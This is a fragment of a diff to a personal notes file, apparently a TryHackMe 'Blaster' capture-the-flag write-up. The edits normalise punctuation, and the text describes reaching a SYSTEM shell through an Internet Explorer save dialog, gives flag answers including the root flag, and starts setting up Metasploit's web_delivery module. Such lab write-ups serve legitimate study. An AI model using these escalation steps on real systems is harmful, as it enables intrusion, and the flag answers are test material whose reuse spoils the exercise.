cardboard-iguana/cardboard-iguana.com/notes/tryhackme-blaster.md

 * Bring up the save dialog in IE.
 * Navigate to `C:/Windows/System32/*.*` and open cmd.exe.

-FLAG 9: What is the output of `whoami` in the terminal spawned using the user’s exploit? — `nt authority\system`
+FLAG 9: What is the output of `whoami` in the terminal spawned using the user's exploit? - `nt authority\system`

-The final flag is in the Administrator’s Desktop folder.
+The final flag is in the Administrator's Desktop folder.

-FLAG 10: What are the contents of `root.txt`? — `THM{COIN_OPERATED_EXPLOITATION}`
+FLAG 10: What are the contents of `root.txt`? - `THM{COIN_OPERATED_EXPLOITATION}`

 ## Adoption into the Collective

-Target information isn’t immediately obvious in Metasploit; after selecting `exploit/multi/script/web_delivery` we’ll need to run `info` to see all of the options.
+Target information isn't immediately obvious in Metasploit; after selecting `exploit/multi/script/web_delivery` we'll need to run `info` to see all of the options.

-FLAG 11: What is the target number for PSH when using `exploit/multi/script/web_delivery` in Metasploit? — 2
+FLAG 11: What is the target number for PSH when using `exploit/multi/script/web_delivery` in Metasploit? - 2

-Let’s set things up and run the exploit:
+Let's set things up and run the exploit:

 ```msfconsole
 set target 2